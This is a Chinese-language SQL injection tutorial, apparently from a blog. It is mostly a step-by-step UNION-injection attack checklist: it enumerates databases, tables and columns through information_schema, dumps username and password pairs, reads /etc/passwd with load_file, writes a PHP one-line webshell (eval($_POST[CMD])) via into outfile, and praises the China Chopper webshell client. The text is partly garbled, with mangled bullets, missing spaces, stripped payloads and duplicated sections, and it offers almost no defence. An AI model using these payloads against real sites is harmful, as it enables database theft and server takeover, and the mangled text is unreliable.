Web安全之SQL注入漏洞

本节知识点

SQL注入原理

前言

结构化查询语句(Structured Query Language,缩写：SQL)，是一种特殊的编程语言，用于数据库中的标准数据查询语言。

SQL注入(SQL Injection)是一种常见的Web安全漏洞，攻击者利用这个问题，可以访问或者修改数据，或者利用潜在的数据库漏洞进行攻击。

什么是SQL注入？

SQL注入(Sql Injection)是一种讲SQL语句插入或者添加到应用(用户)的输入参数中的攻击，之后再将这些参数传递给后台的SQL服务器加以解析并执行。

常见的Web架构

表示层：Web浏览器/呈现引擎---访问网站

逻辑层：脚本语言：ASP、PHP、JSP、.NET等---加载、编译并执行脚本文件

存储层：数据库：MSSQL、MYSQL、ORACLE等---执行SQL语句

哪里存在SQL注入？

哪里存在SQL注入？

lGET

lPOST

lHTTP头部注入

lCookie注入

l……

任何客户端可控，传递到服务器的变量。

漏洞原理

针对SQL注入的攻击行为，可描述为通过用户可控参数中注入SQL语法，破坏原有的SQL结构，达到编写程序时意料之外的结果的攻击行为。

其成因可以归结为以下两点原因叠加造成的：

1.程序编写者再处理程序和数据库交互的时候，使用字符拼接的方法构造SQL语句

2.未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中

SQL注入危害

漏洞危害

攻击者利用SQL注入漏洞，可以获取数据库中的多种信息(例如：管理员后台密码)，从而脱取数据库中内容(脱库)。在特别情况下，还可以修改数据库内容或者插入内容到数据库，如果数据库权限分配存在问题，或者数据库本身存在缺陷，那么攻击者可以通过SQL注入漏洞直接获取Webshell或者服务器系统权限。

SQL注入分类和利用

SQL注入的分类

根据SQL数据类型分类

整型注入

字符串类型注入

根据注入的语法分类

UNIONquery SQL injection(可联合查询注入)

Eoor-basedSQL injection(报错型注入)

Boolean-basedbind SQL injection(布尔型注入)

Time-basedbind SQL injection(基于时间延迟注入)

Stackedqueries SQL injection(可多语句查询注入)

如何去判断SQL注入漏洞？

判断注入

uand

1=1 / and 1=2回显页面不同(整型判断)

u单引号’判断显示数据库错误信息或者页面回显不同(整型，字符串类型判断)

u\(转义符)

u-1

/ +1回显下一个或者上一个页面(整型判断)

uand

sleep(5) (判断页面返回时间)

SQL注入漏洞的利用

MySQL数据库的特性

一．MySQL中的3种注释风格

u#

(url编码为%23)

u--

(--后面要跟上一个或者多个空格)

u--+

(+相当于空格)

u/*…*/

u/*!...*/

二．MySQL函数利用

1.常用函数

luser()---数据库用户名

l

mysql>select user();

+----------------+

|user()|

+----------------+

|root@localhost |

+----------------+

1 rowin set (0.00 sec)

ldatabase()---数据库名

l

mysql>select database();

+------------+

| database()|

+------------+

|security|

+------------+

1 rowin set (0.00 sec)

l@@datadir---数据库路径

l

mysql>select @@datadir;

+-----------------------+

|@@datadir|

+-----------------------+

|C:\server\mysql\data\ |

+-----------------------+

1 rowin set (0.00 sec)

l@@version_compile_os---操作系统版本

l

mysql>select @@version_compile_os;

+----------------------+

|@@version_compile_os |

+----------------------+

|Win64|

+----------------------+

1 rowin set (0.00 sec)

lversion()---MySQL数据库版本

l

mysql>select version();

+-----------+

|version() |

+-----------+

|5.7.16|

+-----------+

1 rowin set (0.04 sec)

l@@version---MySQL数据库版本

l

mysql>select @@version;

+-----------+

|@@version |

+-----------+

|5.7.16|

+-----------+

1 rowin set (0.00 sec)

2.load_file()函数读取文件操作

前提：

l知道文件的绝对路径

l能够使用union查询

l对web目录有写的权限

UNION SELECT1,load_file('/etc/passwd’),3,4,5#

0x2f6574632f706173737764

UNION SELECT 1,load_file(0x2f6574632f706173737764),3,4,5#

路径没有加单引号的话必须转换成十六进制

要是想省略单引号的话必须转换成十六进制

3.into

outfile ‘路径’写入文件操作

前提：

l文件名必须是全路径(绝对路径)

l用户必须有写文件的权限

l没有对单引号’过滤

SELECT ‘’ intooutfile ‘C:\\Windows\\tmp\\1.php’

SELECT ‘’ into outfile ‘C:\\Windows\\tmp\\1.php’

路径里面两个反斜杠\\可以换成一个正斜杠/

PHP语句没有加单引号的话必须转换成十六进制

要是想省略单引号的话必须转换成十六进制

后面路径的单引号不能省略

或者

建议一句话PHP语句转换成十六进制

4.连接字符串函数

lConcat(str1,str2)---没有分隔符的连接字符串

l

mysql>select concat('1234','5678');

+-----------------------+

|concat('1234','5678') |

+-----------------------+

|12345678|

+-----------------------+

1 rowin set (0.03 sec)

lconcat_ws(separator,str1,str2)---含有分隔符的连接字符串

l

mysql>select concat_ws(0x7e,'1234','5678');

+-------------------------------+

|concat_ws(0x7e,'1234','5678') |

+-------------------------------+

|1234~5678|

+-------------------------------+

1 rowin set (0.04 sec)

lgroup_concat(str1,str2)---连接一个组的所有字符串，并且以逗号分割每一条数据

l

mysql>select group_concat('1234','5678');

+-----------------------------+

|group_concat('1234','5678') |

+-----------------------------+

|12345678|

+-----------------------------+

1 rowin set (0.07 sec)

三．MySQL中information_schema数据库

mysql>show tables;

+---------------------------------------+

|Tables_in_information_schema|

+---------------------------------------+

|COLUMNS|

|SCHEMATA|

|TABLES|

+---------------------------------------+

SCHEMATA表

字段：SCHEMA_NAME schema_name存放的是数据库名称

mysql> desc schemata;

+----------------------------+--------------+------+-----+---------+-------+

| Field| Type| Null | Key | Default | Extra |

+----------------------------+--------------+------+-----+---------+-------+

| SCHEMA_NAME| varchar(64)| NO||||

+----------------------------+--------------+------+-----+---------+-------+

5 rows in set (0.11 sec)

TABLES表

字段：TABLE_SCHEMA,TABLE_NAMEtable_schema,table_name

mysql> desc tables;

+-----------------+---------------------+------+-----+---------+-------+

| Field| Type| Null | Key | Default | Extra|

+-----------------+---------------------+------+-----+---------+-------+

| TABLE_SCHEMA| varchar(64)| NO||||

| TABLE_NAME| varchar(64)| NO||||

+-----------------+---------------------+------+-----+---------+-------+

21 rows in set (0.00 sec)

COLUMNS表

字段：TABLE_SCHEMA,TABLE_NAME,COLUMN_NAMEtable_schema,table_name,column_name

mysql> desc columns;

+--------------------------+---------------------+------+-----+---------+------

| Field| Type| Null | Key | Default | Extra

|

+--------------------------+---------------------+------+-----+---------+------

| TABLE_SCHEMA| varchar(64)| NO|||

|

| TABLE_NAME| varchar(64)| NO|||

|

| COLUMN_NAME| varchar(64)| NO|||

+--------------------------+---------------------+------+-----+---------+------

四．MySQL中UNION规则

lUNION必须由两条或者两条以上的SELECT语句组成，语句之间关键字用UNION分隔

lUNION中的查询必须含有相同的列

lUNION会从查询结果中集中自动取出重复行

SQL注入挖掘以及防御

UNION query SQL injection

利用前提：页面上有显示位

优点：方便、快捷、易于利用

缺点：需要显示位

0x001判断是否存在SQL注入，同时判断注入类型：整型注入还是字符串注入

判断注入

uand

1=1 / and 1=2回显页面不同(整型判断)

u单引号’判断显示数据库错误信息或者页面回显不同(整型，字符串类型判断)

u\(转义符)

u-1

/ +1回显下一个或者上一个页面(整型判断)

uand

sleep(5) (判断页面返回时间)

0x002判断显示位长度，判断列数(二分法)

orderby 10

orderby 20

orderby 15

……

0x003判断查找显示位，UNION联合查询

unionselect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

0x004查找获取当前所用的数据库用户名，数据库名，数据库路径，操作系统版本，MySQL版本

user()---数据库用户名

database()---数据库名

@@datadir---数据库路径

@@version_compile_os---操作系统版本

version()---MySQL数据库版本

@@version---MySQL数据库版本

0x005查找列出所有的数据库名称

limit一个一个打印出来数据库名字

selectconcat(schema_name) from information_schema.schemata limit 0,1

group_concat一次性全部显示

selectgroup_concat(schema_name) from information_schema.schemata

0x006查找列出所有的表名

limit一个一个打印出来表名

select

concat(table_name) from information_schema.tables where table_schema=0x(数据库名称转十六进制) limit 0,1

group_concat一次性全部显示

select

group_concat(table_name) from information_schema.tables where table_schema=0x(数据库名称转十六进制)

0x007查找列出所有的字段

limit一个一个打印出来字段

select

concat(column_name) from information_schema.columns where table_schema=0x(数据库名称转十六进制) and table_name=0x(表名转十六进制) limit 0,1

group_concat一次性全部显示

select group_concat(column_name)

from information_schema.columns where table_schema=0x(数据库名称转十六进制) and table_name=0x(表名转十六进制)

0x008查找列出所有需要的数据

limit一个一个打印出来数据

select

concat(concat(0x7e,username,0x7e,password)) from数据库名字.表名limit 0,1

group_concat一次性全部显示

select

group_concat(concat(0x7e,username,0x7e,password)) from数据库名字.表名

0x009 load_file()读取文件操作

前提：

l知道文件的绝对路径

l能够使用union查询

l对web目录有写的权限

UNION SELECT1,load_file('/etc/passwd’),3,4,5#

0x2f6574632f706173737764

UNION SELECT1,load_file(0x2f6574632f706173737764),3,4,5#

路径没有加单引号的话必须转换成十六进制

要是想省略单引号的话必须转换成十六进制

0x010 into outfile写入文件操作

前提：

l文件名必须是全路径(绝对路径)

l用户必须有写文件的权限

l没有对单引号’过滤

SELECT ‘’ into outfile ‘C:\\Windows\\tmp\\1.php’

SELECT ‘’ into outfile ‘C:\\Windows\\tmp\\1.php’

路径里面两个反斜杠\\可以换成一个正斜杠/

PHP语句没有加单引号的话必须转换成十六进制

要是想省略单引号的话必须转换成十六进制

后面路径的单引号不能省略

eval($_POST[CMD]); ?>或者

建议一句话PHP语句转换成十六进制

0x011一句话木马

eval($_POST[CMD]); ?>或者

0x012菜刀连接

武功再高，也怕菜刀，中国菜刀，就是屌

SQL注入UNION联合查询类型手札

0x001判断是否存在SQL注入，同时判断注入类型：整型注入还是字符串型注入

and 1=1 / and 1=2回显页面不同(整型判断)

单引号'显示数据库错误或者页面回显不同(整型、字符串类型判断)

\转义符

-1 / +1回显下一页或上一页(整型判断)

and sleep(5)判断页面返回时间

0x002判断显示位长度，判断列数(二分法)

order by 10

order by 20

order by 15

0x003判断查找显示位，UNION联合查询

union select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

0x004查找获取当前所用的数据库用户名，数据库名，数据库路径，操作系统版本，MySQL版本

user()---数据库用户名

database()---数据库名

@@datadir---数据库路径

@@version_compile_os---操作系统版本

version()---MySQL版本

0x005查找列出所有数据库名称、表名

数据库：

selectconcat(schema_name) from information_schema.schemata limit 0,1

selectgroup_concat(schema_name) from information_schema.schemata

表名：

selectconcat(table_name) from information_schema.tables where table_schema = 0x(数据库名称转十六进制) limit 0,1

selectgroup_concat(table_name) from information_schema.tables where table_schema =0x(数据库名称转十六进制)

0x006查找列出所有的字段

select concat(column_name)from information_schema.columns where table_schema = 0x(数据库名字转十六进制) and table_name = 0x(表名转十六进制) limit 0,1

selectgroup_concat(column_name) from information_schema.columns where table_schema =0x(数据库名字转十六进制) and

table_name = 0x(表名转十六进制)

0x007查找列出所有需要的数据

selectconcat(concat(0x7e,username,0x7e,password)) from数据库名字.表名limit 0,1

selectgroup_concat(concat(0x7e,username,0x7e,password)) from数据库名字.表名

0x008 load_file()读取文件操作

load_file('/etc/passwd')

load_file(0x2f6574632f706173737764)

0x009 into outfile写入文件操作

''into outfile'C:\\Windows\\tmp\\1.php'

0x010一句话木马

''

''

''

''

''

0x011菜刀连接

武功再高，也怕菜刀，中国菜刀，就是叼